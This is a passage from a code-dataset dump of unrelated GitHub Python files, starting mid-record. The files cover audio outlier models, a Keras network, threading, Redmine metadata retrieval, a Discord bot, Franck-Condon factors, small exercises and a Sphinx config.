learn_outlier_model(tagged_data, preprocess_pipeline, n_centroids=5):\n\n sound, tag = tagged_sounds_to_single_array(*tagged_data)\n wfs = np.array(sound)\n\n wfs = assert_dims(wfs)\n\n fvs = preprocess_pipeline(wfs)\n model = Stroll(n_centroids=n_centroids)\n model.fit(X=fvs)\n\n return model\n\n\n@crudifier(\n param_to_mall_map=dict(\n tagged_data='sound_output',\n preprocess_pipeline='pipelines',\n fitted_model='learned_models',\n ),\n output_store='models_scores',\n)\n@UploadFilesStore.resolve_item_getter_args\ndef apply_fitted_model(tagged_data, preprocess_pipeline, fitted_model):\n try:\n dill_files['tagged_data'] = tagged_data\n except Exception as e:\n 
print('tagged_data', e)\n try:\n dill_files['preprocess_pipeline'] = preprocess_pipeline\n except Exception as e:\n print('preprocess_pipeline', e)\n try:\n dill_files['fitted_model'] = fitted_model\n except Exception as e:\n print('fitted_model', e)\n sound, tag = tagged_sounds_to_single_array(*tagged_data)\n wfs = np.array(sound)\n wfs = assert_dims(wfs)\n\n fvs = preprocess_pipeline(wfs)\n scores = fitted_model.score_samples(X=fvs)\n return scores\n\n\n@crudifier(param_to_mall_map=dict(pipeline='pipelines'),)\ndef visualize_pipeline(pipeline: LineParametrized):\n\n return pipeline\n\n\n@crudifier(param_to_mall_map=dict(scores='models_scores'),)\ndef visualize_scores(scores, threshold=80, num_segs=3):\n\n intervals = scores_to_intervals(scores, threshold, num_segs)\n\n return scores, intervals\n\n\n@crudifier(\n param_to_mall_map=dict(\n preprocess_pipeline='pipelines', fitted_model='learned_models',\n ),\n output_store='source',\n)\ndef live_apply_fitted_model(\n preprocess_pipeline,\n fitted_model,\n input_device=None,\n rate=44100,\n width=2,\n channels=1,\n frames_per_buffer=44100,\n seconds_to_keep_in_stream_buffer=60,\n graph_types='volume',\n):\n stop_stream()\n audio_store_rootdir = Path.cwd() / 'audio_store'\n audio_store_rootdir.mkdir(parents=True, exist_ok=True)\n audio_store = WavFileStore(rootdir=str(audio_store_rootdir))\n\n source = mk_live_graph_data_buffer(\n input_device,\n rate,\n width,\n channels,\n frames_per_buffer,\n seconds_to_keep_in_stream_buffer,\n graph_types,\n audio_store=audio_store,\n **si_apply_fitted_model(preprocess_pipeline, fitted_model),\n )\n source.start()\n return source\n","repo_name":"otosense/plunk","sub_path":"plunk/ap/app4_drill_but_make_it_slabsiter/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":5999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
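simple_chunker and simple_featurizer are imported from elsewhere in the package; a hedged toy sketch of the shape contract such a chunker -> featurizer pipeline typically honors (names and sizes below are made up for illustration, not the package's actual implementations):

import numpy as np

def toy_chunker(wf, chunk_size=4):
    n = len(wf) // chunk_size * chunk_size  # drop the ragged tail
    return wf[:n].reshape(-1, chunk_size)

def toy_featurizer(chunks):
    # one (mean, std) feature vector per chunk
    return np.stack([chunks.mean(axis=1), chunks.std(axis=1)], axis=1)

wf = np.arange(10, dtype=float)
print(toy_featurizer(toy_chunker(wf)).shape)  # (2, 2): 2 chunks x 2 features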
+{"seq_id":"16735667301","text":"import numpy as np\nfrom data import get_in_out_simple_predictive_NN\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras import Sequential, layers\nimport matplotlib.pyplot as plt\n\n# Parameters\nlearning_rate = 1.59e-7\nmomentum = 0.95\nnb_epochs = 10\nbatch_size = 128\ntest_ratio = 0.3\nnb_neurone_layer_1 = 256\nnb_neurone_layer_2 = 256\nnb_neurone_layer_3 = 64\n\n\ndef generate_predictive_NN():\n \"\"\"\n Generate the predictive NN which predict the next angles of the arm based on the current ones\n\n :return: None\n \"\"\"\n # Load data\n inputs, outputs = get_in_out_simple_predictive_NN()\n n, p = inputs.shape\n nb_inputs = 12 # 17\n nb_outputs = 5\n\n X_train, X_test, y_train, y_test = train_test_split(inputs, outputs, test_size=test_ratio)\n\n mod = Sequential()\n mod.add(layers.Dense(nb_neurone_layer_1, activation='relu', input_shape=(nb_inputs,)))\n mod.add(layers.Dense(nb_neurone_layer_2, activation='relu'))\n mod.add(layers.Dropout(0.5))\n mod.add(layers.Dense(nb_neurone_layer_3, activation='relu'))\n mod.add(layers.Dense(nb_outputs, activation='linear'))\n mod.compile(loss='mse')\n print(\"Model created !\")\n\n print(\"Training of the model ...\")\n hist = mod.fit(X_train, y_train, batch_size=batch_size, epochs=nb_epochs, validation_data=(X_test, y_test))\n print(\"Model trained !\")\n mod.save('models/predictive_NN')\n print(\"Model saved !\")\n\n loss_values = hist.history['loss']\n val_loss_values = hist.history['val_loss']\n epochs = range(1, len(loss_values) + 1)\n\n plt.plot(epochs, loss_values, label='Training Loss')\n plt.plot(epochs, val_loss_values, label='Validation Loss')\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.legend()\n\n plt.show()\n","repo_name":"MarcDcls/AI_Prosthesis","sub_path":"predictive_NN.py","file_name":"predictive_NN.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"25244091624","text":"'使用threading 模块创建线程,直接从threading.Thread继承'\n\nimport threading\nimport time\n\n\nexitFlag = 0\n\n\ndef print_time(threadName, delay, counter):\n while counter:\n if exitFlag:\n threading.Thread.exit()\n time.sleep(delay)\n print('{0}: {1}'.format(threadName, time.ctime(time.time())))\n counter -= 1\n\n\nclass MyThread(threading.Thread):\n '''\n 继承threaing.Thread类,重写__init__()和run()方法\n '''\n\n def __init__(self, threadID, name, counter):\n '''\n 重写__init__()\n :param threadID:\n :param name: 线程名字\n :param counter:\n '''\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.counter = counter\n\n def run(self):\n '''\n 将要执行的代码写入run()函数里,线程在创建后会直接运行run()函数\n :return:\n '''\n print('starting ', self.name)\n print_time(self.name, self.counter, 5)\n print('Exiting ', self.name)\n\n\n\ndef main():\n # 创建线程\n thread1 = MyThread(1, 'Thread-1', 1)\n thread2 = MyThread(2, 'Thread-2', 2)\n\n # 启动线程\n thread1.start()\n thread2.start()\n\n print('Exiting Main Thread')\n\nif __name__ == '__main__':\n main()","repo_name":"haalo/learning-Python3","sub_path":"day01/threadings_test/threading_01.py","file_name":"threading_01.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"10442111016","text":"from typing import Dict, List, Tuple\nimport argparse\nimport json\nimport re\nfrom unidecode import unidecode\nfrom pathlib import Path\nfrom redminelib import Redmine\nfrom redminelib.resources import Issue as RedmineIssue\nfrom redminelib.managers import ResourceManager as RedmineResource\n\nurl = 'https://redmine.apidb.org'\ndefault_fields = dict(\n status_name='Data Processing (EBI)',\n cf_17=\"Data Processing (EBI)\",\n)\ninsdc_pattern = r'^GC[AF]_\\d{9}(\\.\\d+)?$'\naccession_api_url = \"https://www.ebi.ac.uk/ena/browser/api/xml/%s\"\nveupathdb_id = 1976\n\n\ndef load_abbrevs(path: str) -> List[str]:\n \"\"\"\n Load a list of organism abbrevs from a file. Expected to be one per line.\n\n Args:\n path: Path to the organism abbrevs file.\n\n Returns:\n A list of all organism_abbrevs.\n\n \"\"\"\n if not path:\n print(\"Warning: I don't have a list of older abbrevs to compare with.\")\n return []\n abbrevs = []\n with open(path, \"r\") as abbr_file:\n for line in abbr_file:\n line = line.rstrip()\n if line:\n fields = line.split(\"\\t\")\n if len(fields) == 1:\n abbrevs.append(line)\n else:\n raise Exception(\n \"Can't load current abbrevs from a multicolumn string\")\n return abbrevs\n\n\ndef retrieve_rnaseq_datasets(redmine: Redmine, output_dir_path: str, build: int = None,\n abbrevs_file: str = None) -> None:\n \"\"\"\n Get RNA-Seq metadata from Redmine, store them in json files.\n Each issue/dataset is stored as one file in the output dir.\n\n Args:\n redmine: A connected Redmine object.\n output_dir_path: Directory where the dataset files are to be stored.\n build: BRC build number.\n abbrevs_file: Path to a list of organism_abbrevs that are already in use.\n \"\"\"\n\n all_abbrevs = load_abbrevs(abbrevs_file)\n\n issues = get_issues(redmine, \"RNA-seq\", build)\n if not issues:\n print(\"No files to create\")\n return\n \n # Create the output dir\n output_dir = Path(output_dir_path)\n output_dir.mkdir(exist_ok=True)\n \n # Write all datasets in files\n all_datasets = []\n used_names = []\n\n problems = []\n ok_datasets = []\n warn_abbrevs = []\n \n for issue in issues:\n dataset, problem = parse_dataset(issue)\n \n if problem:\n problems.append({\"issue\": issue, \"desc\": problem})\n continue\n\n try:\n component = dataset[\"component\"]\n organism = dataset[\"species\"]\n dataset_name = dataset[\"name\"]\n \n if dataset_name in used_names:\n problems.append(\n {\"issue\": issue, \"desc\": f\"Dataset name already used: {dataset_name}\"}\n )\n continue\n else:\n used_names.append(dataset_name)\n \n if abbrevs_file and organism not in all_abbrevs:\n warn_abbrevs.append({\"issue\": issue, \"desc\": organism})\n \n ok_datasets.append({\"issue\": issue, \"desc\": organism})\n \n # Create directory\n dataset_dir = output_dir / component\n dataset_dir.mkdir(exist_ok=True)\n \n # Create file\n file_name = organism + \"_\" + dataset_name + \".json\"\n dataset_file = dataset_dir / file_name\n with open(dataset_file, \"w\") as f:\n json.dump([dataset], f, indent=True)\n except Exception as error:\n problems.append({\"issue\": issue, \"desc\": str(error)})\n pass\n all_datasets.append(dataset)\n\n print(\"%d issues total\" % len(issues))\n print_summaries(problems, \"issues with problems\")\n print_summaries(\n warn_abbrevs,\n \"issues using unknown organism_abbrevs (maybe new ones). 
Those are still imported\"\n )\n print_summaries(ok_datasets, \"datasets imported correctly\")\n\n # Create a single merged file as well\n merged_file = Path(output_dir) / \"all.json\"\n with open(merged_file, \"w\") as f:\n json.dump(all_datasets, f, indent=True)\n\n \ndef print_summaries(summaries: Dict, description: str) -> None:\n \"\"\"Print a summary of various counts.\n\n This will print one line for each issue in the dict, with its description, the issue id\n and the issue subject.\n\n Args:\n summaries: Dict with 2 keys:\n issue: A Redmine Issue object.\n desc: A description for that issue.\n \"\"\"\n desc_length = 64\n \n if summaries:\n print()\n print(f\"{len(summaries)} {description}:\")\n for summary in summaries:\n desc = summary[\"desc\"]\n issue = summary[\"issue\"]\n print(f\"\\t{desc:{desc_length}}\\t{issue.id}\\t({issue.subject})\")\n \n \ndef parse_dataset(issue: RedmineIssue) -> Tuple[Dict, str]:\n \"\"\"\n Extract RNA-Seq dataset metadata from a Redmine issue.\n\n Args:\n issue: A Redmine issue.\n\n Returns:\n A tuple of 2 objects:\n datasets: A dict representing a dataset, with the following keys:\n component: String for the BRC component DB.\n species: String for the organism abbrev.\n name: String for the internal dataset name.\n problem: A string description if there was a parsing problem\n (empty string otherwise).\n \"\"\"\n customs = get_custom_fields(issue)\n dataset = {\n \"component\": \"\",\n \"species\": \"\",\n \"name\": \"\",\n \"runs\": [],\n }\n problem = \"\"\n\n dataset[\"component\"] = get_custom_value(customs, \"Component DB\")\n dataset[\"species\"] = get_custom_value(customs, \"Organism Abbreviation\").strip()\n dataset[\"name\"] = get_custom_value(customs, \"Internal dataset name\").strip()\n\n if not dataset[\"species\"]:\n problem = \"Missing Organism Abbreviation\"\n elif not check_organism_abbrev(dataset[\"species\"]):\n problem = f\"Wrong Organism Abbreviation format: '{dataset['species']}'\"\n elif not dataset[\"name\"]:\n problem = \"Missing Internal dataset name\"\n else:\n dataset[\"name\"] = normalize_name(dataset[\"name\"])\n \n # Get samples/runs\n samples_str = get_custom_value(customs, \"Sample Names\")\n try:\n samples = parse_samples(samples_str)\n \n if not samples:\n problem = \"Missing Samples\"\n \n dataset[\"runs\"] = samples\n except Exception as e:\n problem = str(e)\n \n return dataset, problem\n\n\ndef check_organism_abbrev(name: str) -> bool:\n \"\"\"Check the organism_abbrevs string format to avoid special characters.\n\n Args:\n name: organism_abbrev to check.\n \n Returns:\n True if the organism_abbrev format is correct.\n False otherwise.\n \"\"\"\n return not re.search(r'[ \\/\\(\\)#\\[\\]:]', name)\n\n\ndef normalize_name(old_name: str) -> str:\n \"\"\"Remove special characters from an organism_abbrev, keep ascii only.\n\n Args:\n old_name: the organism_abbrev to format.\n \n Returns:\n The formatted organism_abbrev.\n \"\"\"\n \n # Remove any diacritics\n name = old_name.strip()\n name = unidecode(name)\n name = re.sub(r\"[ /]\", \"_\", name)\n name = re.sub(r\"[;:.,()\\[\\]{}]\", \"\", name)\n name = re.sub(r\"\\+\", \"_plus_\", name)\n name = re.sub(r\"\\*\", \"_star_\", name)\n name = re.sub(r\"%\", \"pc_\", name)\n name = re.sub(r\"_+\", \"_\", name)\n if re.search(r\"[^A-Za-z0-9_.-]\", name):\n print(\"WARNING: name contains special characters: %s (%s)\" % (old_name, name))\n return\n \n return name\n\n\ndef parse_samples(sample_str: str) -> List[Dict]:\n \"\"\"Parse a list of samples from a Redmine 
task.\n\n Args:\n sample_str: The value of the field 'Sample Names' from an RNA-Seq Redmine task.\n \n Returns:\n A list of samples dicts, with the following keys:\n name: the name of the sample.\n accessions: a list of string representing the SRA accessions for that sample.\n \"\"\"\n samples = []\n \n # Parse each line\n lines = sample_str.split(\"\\n\")\n\n sample_names = dict()\n for line in lines:\n line = line.strip()\n if line == \"\":\n continue\n\n # Get sample_name -> accessions\n parts = line.split(\":\")\n if len(parts) > 2:\n end = parts[-1]\n start = \":\".join(parts[:-1])\n parts = [start, end]\n \n if len(parts) == 2:\n sample_name = parts[0].strip()\n \n if sample_name in sample_names:\n raise Exception(\"Several samples have the same name '%s'\" % sample_name)\n else:\n sample_names[sample_name] = True\n \n accessions_str = parts[1].strip()\n accessions = [x.strip() for x in accessions_str.split(\",\")]\n \n if not validate_accessions(accessions):\n if validate_accessions(sample_name.split(\",\")):\n raise Exception(\"Sample name and accessions are switched?\")\n else:\n raise Exception(f\"Invalid accession among '{accessions}'\")\n \n sample = {\n \"name\": normalize_name(sample_name),\n \"accessions\": accessions\n }\n samples.append(sample)\n else:\n raise Exception(\"Sample line doesn't have 2 parts: '%s'\" % line)\n \n return samples\n\n\ndef validate_accessions(accessions: str) -> bool:\n \"\"\"Check SRA accessions format, to make sure we get proper ones.\n\n Args:\n accessions: a list of strings to check\n\n Return:\n True if all strings are proper SRA accessions.\n False if at least one is not a proper SRA accession.\n \"\"\"\n if \"\" in accessions:\n return False\n for acc in accessions:\n if not re.search(r'^[SE]R[RSXP]\\d+$', acc):\n return False\n return True\n\n\ndef get_custom_fields(issue: RedmineIssue) -> Dict:\n \"\"\"Put all Redmine custom fields in a dict instead of an array.\n\n Args:\n issue: A Redmine issue.\n \n Returns:\n A dict where each key is a custom field.\n \"\"\"\n \n cfs = {}\n for c in issue.custom_fields:\n cfs[c[\"name\"]] = c\n return cfs\n\n\ndef get_custom_value(customs: Dict, key: str) -> str:\n \"\"\"Retrieve a custom value from a customs dict.\n\n Args:\n customs: Dict of customs values gotten from get_custom_fields.\n key: Key to extract the value from the custom dict.\n \n Returns:\n A single value.\n Throws an exception if there are more than 1 value.\n If there is no such key in the dict, return an empty string.\n \"\"\"\n \n try:\n value = customs[key][\"value\"]\n if isinstance(value, list):\n if len(value) == 1:\n value = value[0]\n elif len(value) > 1:\n raise Exception(\"More than 1 values for key %s\" % (key))\n return value\n except KeyError:\n print(\"No field %s\" % (key))\n return \"\"\n \n\ndef get_issues(redmine: Redmine, datatype: str, build: int = None) -> List[RedmineIssue]:\n \"\"\"Retrieve all issue for new genomes, be they with or without gene sets.\n\n Args:\n redmine: A Redmine connected object.\n datatype: What datatype to use to filter the issues.\n build: The BRC build to use to filter.\n\n Returns:\n A list of Redmine issues.\n \"\"\"\n \n other_fields = {\"cf_94\": datatype}\n if build:\n version_id = get_version_id(redmine, build)\n other_fields[\"fixed_version_id\"] = version_id\n\n return list(get_ebi_issues(redmine, other_fields))\n\n\ndef get_version_id(redmine: Redmine, build: int) -> int:\n \"\"\"Given a build number, get the Redmine version id for it.\n\n Args:\n redmine: A Redmine connected 
object.\n build: The BRC build to use to filter.\n\n Returns:\n The version id from Redmine for that build.\n \"\"\"\n versions = redmine.version.filter(project_id=veupathdb_id)\n version_name = \"Build \" + str(build)\n version_ids = [version.id for version in versions if version.name == version_name]\n # Return a single id (the annotation promises an int), not the whole list\n return version_ids[0] if version_ids else None\n\n \ndef get_ebi_issues(redmine, other_fields=dict()) -> RedmineResource:\n \"\"\"Get EBI issues from Redmine, add other fields if provided.\n\n Args:\n redmine: A Redmine connected object.\n other_fields: A dict of fields to provide to filter the issues.\n\n Returns:\n A Redmine resource set.\n \"\"\"\n # Other fields replace the keys that already exist in default_fields\n search_fields = {**default_fields, **other_fields}\n \n return redmine.issue.filter(**search_fields)\n \n\ndef main():\n parser = argparse.ArgumentParser(description='Retrieve metadata from Redmine')\n \n parser.add_argument('--key', type=str, required=True,\n help='Redmine authentication key')\n parser.add_argument('--output_dir', type=str, required=True,\n help='Output directory')\n # Choice\n parser.add_argument('--get', choices=['rnaseq', 'dnaseq'], required=True,\n help='Get rnaseq, or dnaseq issues')\n # Optional\n parser.add_argument('--build', type=int,\n help='Restrict to a given build')\n parser.add_argument('--current_abbrevs', type=str,\n help='File that contains the list of current organism_abbrevs')\n args = parser.parse_args()\n \n # Start Redmine API\n redmine = Redmine(url, key=args.key)\n \n # Choose which data to retrieve\n if args.get == 'rnaseq':\n retrieve_rnaseq_datasets(redmine, args.output_dir, args.build, args.current_abbrevs)\n elif args.get == 'dnaseq':\n # TODO\n # retrieve_dnaseq_datasets(redmine, args.output_dir, args.build, args.current_abbrevs)\n print(\"Not yet implemented\")\n else:\n print(\"Need to say what data you want to --get: rnaseq? dnaseq?\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Ensembl/ensembl-production-imported","sub_path":"scripts/brc4/get_rnaseq_from_redmine.py","file_name":"get_rnaseq_from_redmine.py","file_ext":"py","file_size_in_byte":14026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
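For reference, the 'Sample Names' custom field consumed by parse_samples in the record above holds one name: accessions pair per line. A minimal standalone sketch of the same split-and-validate rules (the sample names and accession numbers are made up for illustration):

import re

def looks_like_sra_accession(acc: str) -> bool:
    # same pattern as validate_accessions above: SRR/SRX/SRS/SRP or ERR/ERX/ERS/ERP plus digits
    return bool(re.search(r'^[SE]R[RSXP]\d+$', acc))

field = "sampleA: SRR0000001, SRR0000002\nsampleB: ERR0000003"  # hypothetical field content
for line in field.splitlines():
    name, accession_str = line.split(":", 1)
    accessions = [a.strip() for a in accession_str.split(",")]
    print(name.strip(), accessions, all(looks_like_sra_accession(a) for a in accessions))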
+{"seq_id":"32670336966","text":"import os\nfrom discord.ext import commands\nfrom database import session, Prefixes\nfrom discord import Intents\n\ndef get_prefix(_bot, message):\n try:\n return session.query(Prefixes).filter_by(server_id=message.guild.id).one().prefix\n except:\n return \"!!\"\n\ndef main():\n intents: Intents = Intents.default()\n\n Bot = commands.Bot(command_prefix=get_prefix, intents=intents)\n Bot.remove_command(\"help\")\n\n for f in os.listdir('./cogs'):\n if f.endswith('.py'):\n Bot.load_extension(f'cogs.{f[:-3]}')\n\n token = os.environ['TOKEN']\n\n Bot.run(token)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Darth-Kylokun/prayer-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"38828804081","text":"f = open('text_of_program.txt', 'r', encoding='utf-8')\n\narray = [row.strip() for row in f]\nfor i in array:\n if(i == ''):\n array.remove(i) #удалить пробелы\n\nnew_array = []\nfor i in array:\n new_array.append(list(i)) #разбить строки на символы\n\nfor i in range(len(new_array) - 1): #удаление всех string в строках\n start_symbol = False\n for j in range(len(new_array[i]) - 1):\n if (start_symbol == False and new_array[i][j] == '\"'):\n start_symbol = True\n elif (start_symbol == True and new_array[i][j] == '\"'):\n start_symbol = False\n new_array[i][j] = False\n elif (start_symbol == True):\n new_array[i][j] = False\n\ntext_without_string = \"\"\n\nfor i in range(len(new_array)):\n for j in range(len(new_array[i])):\n text_without_string += str(new_array[i][j])\n text_without_string += '\\n'\n\nlines_text_without_string = text_without_string.split('\\n')\n\nnodes_count = 0\nfor i in lines_text_without_string:\n if (len(i) > 1 and i.count('{') == 0 and i.count('}') == 0 and i.count('};') == 0):\n nodes_count += 1\n\nprint('Количество узлов = ', nodes_count)\n\nedge_count = 0\nfor i in lines_text_without_string:\n if (len(i) > 1 and i.count('{') == 0 and i.count('}') == 0 and i.count('};') == 0):\n edge_count += 1\n if (i.count('if') > 0):\n edge_count += 2\n if (i.count('else') > 0):\n edge_count += 1\n if (i.count('for') > 0):\n edge_count += 1\n if (i.count('while') > 0):\n edge_count += 1\n if (i.count('switch') > 0):\n edge_count += 1\n if (i.count('case') > 0):\n edge_count += 1\n\nprint('Количество рёбер = ', edge_count)\n\nV = edge_count - nodes_count + 2\nprint('Метрика Мак-Кейба = ', V)\n\nf.close()","repo_name":"VitasVital/Bachelor_course","sub_path":"4Cours1Sem/Technologies_and_development_standards/Gusev.V.E.09-832_lab_2.py","file_name":"Gusev.V.E.09-832_lab_2.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"43554768237","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 12 14:50:39 2021\n\nTODO:\n multidimensional;\n Duchinsky rotation;\n\n@author: Bing\n\"\"\"\n\nimport math\n\nfrom math import factorial\nfrom math import sqrt, exp\nfrom scipy.special import hermite, binom\n# import numba\n\ndef dfactortial(n):\n return math.prod(range(n, 0, -2))\n\n# @numba.jit\ndef FranckCondon(Ln, Lm, d):\n '''\n Analytical formula for the Franck-Condon factors from\n\n Chang, J.-L. Journal of Molecular Spectroscopy 232, 102–104 (2005).\n\n Parameters\n ----------\n Ln : TYPE\n DESCRIPTION.\n Lm : TYPE\n DESCRIPTION.\n d : TYPE\n DESCRIPTION.\n\n Returns\n -------\n float\n Franck-Condon overlap.\n\n '''\n\n # If the excited state frequency (Ln[1]) is greater than the ground state\n # frequency (Lm[1]) then we must swap Ln and Lm for the program, but then\n # take the absolute value of the result.\n if (Ln[1] > Lm[1]):\n Ln, Lm = Lm, Ln\n\n n = Ln[0]\n m = Lm[0]\n wn_wavenumbers = Ln[1]\n wm_wavenumbers = Lm[1]\n\n wn = wn_wavenumbers/8065.5/27.2116\n wm = wm_wavenumbers/8065.5/27.2116\n # f = float(wn)/wm\n # w = wm\n\n # The formula is used for (x+d)^2 whereas I use (x-d)^2 for\n # the excited-state surface\n d = -d\n # F is the (massless) force constant for the mode. But which w?\n # F = w ** 2\n\n #convertedQSquared = deltaQ**2/(6.02214*(10**23) * 9.1094*(10**-28))\n # convertedQSquared = deltaQ**2\n\n\n # X is defined as such in Siders, Marcus 1981 Average frequency?\n # X = convertedQSquared / 2\n A = 2. * sqrt(wn * wm)/(wn + wm)\n S = d**2 * wn*wm/(wn + wm)\n\n p = sqrt(A*exp(-S)/(factorial(n) * factorial(m))) / 2.**((n+m)/2)\n\n def I(i,j):\n if (i+j) % 2 == 0:\n K = (i+j)//2\n return dfactortial(i+j-1)/(wn + wm)**K\n else:\n return 0\n\n fc = 0\n for i in range(n+1):\n F = hermite(n-i)\n bn = - wm * sqrt(wn)* d/(wn + wm)\n\n for j in range(m+1):\n\n G = hermite(m-j)\n bm = wn * sqrt(wm) * d/(wn + wm)\n\n fc += binom(n, i) * binom(m, j) * F(bn) * G(bm) * (2*sqrt(wn))**i *\\\n (2*sqrt(wm))**j * I(i, j)\n\n return fc * p\n\n\n\n\n# def genIntensities( deltaE, deltaQ, w_wavenumbers, wprime_wavenumbers):\n# \"\"\" wprime must be greater than w\"\"\"\n# wprime = wprime_wavenumbers/8065.5/27.2116\n# w = w_wavenumbers/8065.5/27.2116\n# intensityFunction = lambda n: (diffFreqOverlap([n, wprime_wavenumbers], [0, w_wavenumbers], deltaQ))**2\n# intensities = map(intensityFunction, range(0,11))\n# return intensities\n\n# def genEnergies(deltaE, w_wavenumbers, wprime_wavenumbers):\n# wprime = wprime_wavenumbers/8065.5/27.2116\n# w = w_wavenumbers/8065.5/27.2116\n# energyFunction = lambda n: (deltaE + (n+0.5)*(wprime) - 0.5*w)\n# energies = map(energyFunction, range(0, 11))\n# return energies\n\n\nif __name__ == '__main__':\n\n fc = FranckCondon([2, 500], [2, 500], 0)\n print(fc)","repo_name":"binggu56/pyqed","sub_path":"pyqed/FranckCondon.py","file_name":"FranckCondon.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"7"}
+{"seq_id":"72685403104","text":"class RecentCounter:\n\n def __init__(self):\n self.count = 0\n self.requests = []\n\n def ping(self, t: int) -> int:\n in_range_count = 1\n i = 0\n for req in self.requests:\n if t - 3000 <= req <= t:\n in_range_count += 1\n elif req > t:\n break\n i += 1\n self.requests.insert(i, t)\n return in_range_count\n\n\n# Your RecentCounter object will be instantiated and called as such:\n# obj = RecentCounter()\n# param_1 = obj.ping(t)\n\n\n# TLE\n# https://leetcode.com/submissions/detail/403134818/testcase/\n","repo_name":"daviddwlee84/LeetCode","sub_path":"Python3/Design/NumberOfRecentCells/Naive933.py","file_name":"Naive933.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"}
+{"seq_id":"7152033944","text":"import random\nimport time\n\nlottery = []\n\nwhile len(lottery) != 6:\n lottery.append(random.randint(1, 45))\n lottery = list(set(lottery))\n\nfor key, value in enumerate(lottery):\n print(\"%d번 숫자\" % (key+1), end=\" \")\n time.sleep(1)\n print(\"%d입니다.\" % value)\n time.sleep(0.5)\n","repo_name":"Meengkko/bigdata_python2019","sub_path":"01_jump_to_python/5_APP/exer2/q13.py","file_name":"q13.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"35018432676","text":"# Configuration file for the Sphinx documentation builder.\n#\n# For the full list of built-in configuration values, see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Project information -----------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information\n\nproject = 'Dummy'\ncopyright = '2022, Ben'\nauthor = 'Ben'\nrelease = '1.0'\n\n# -- General configuration ---------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration\n\nextensions = [\n\t\"autoapi.extension\",\n\t\"sphinx_rtd_theme\",\n \"myst_parser\",\n]\n\ntemplates_path = ['_templates']\nexclude_patterns = []\n\nautoapi_type = 'python'\nautoapi_dirs = ['../../src']\n\nsource_suffix = {\n \".rst\": \"restructuredtext\",\n \".md\": \"markdown\",\n}\n\nmyst_enable_extensions = [\n \"linkify\", # trun URLs into links automatically\n \"dollarmath\", # support for $..$ and $$..$$ math environments\n \"substitution\", # enable jina2 style substitutions\n \"deflist\", # enable markup for Pandoc style definitions \n \"html_image\", # enable support for HTML image tags\n \"html_admonition\", # enable support for HTML info/warning/tip boxes\n \"colon_fence\", # enable support for colon fence environment, e.g. for figure-md\n]\nmyst_dmath_double_inline = True # enable support for inline $$-blocks \nmyst_heading_anchors = 4 # enable automatic anchor generation down to n-th level headings\n\n# -- Options for HTML output -------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output\n\nhtml_theme = \"sphinx_rtd_theme\"\nhtml_static_path = ['_static']\n","repo_name":"bwulff/dummy_for_myst_parser","sub_path":"doc/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"4301276804","text":"# This script converts all jpg file in current dir to thumbnail size and save the files in 'thumbnails' folder\n\nfrom PIL import Image\nimport glob\nimport os\n\nsize = 128, 128\n\nif not os.path.exists('thumbnails'):\n os.makedirs('thumbnails')\n\nfor infile in glob.glob(\"*.jpg\"):\n file, ext = os.path.splitext(infile)\n im = Image.open(infile)\n im.thumbnail(size)\n os.chdir('thumbnails')\n im.save(file + \"_thumbnail\" + \".jpg\")\n os.chdir(os.pardir)\n","repo_name":"kamalhisyam/rally-workshop","sub_path":"run3/src/to_thumbnails.py","file_name":"to_thumbnails.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"7973048844","text":"\n\n #2- search\nN =int(input())\nA = input().split()\nM = int(input())\n\ni=0\nfound = False\nfor i in range(len(A)):\n if(int(A[i])==M):\n print(i)\n found = True\n break\nif(found == False):\n print(-1)\n","repo_name":"HusseinAlswasy/Sheet3","sub_path":"Search.py","file_name":"Search.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
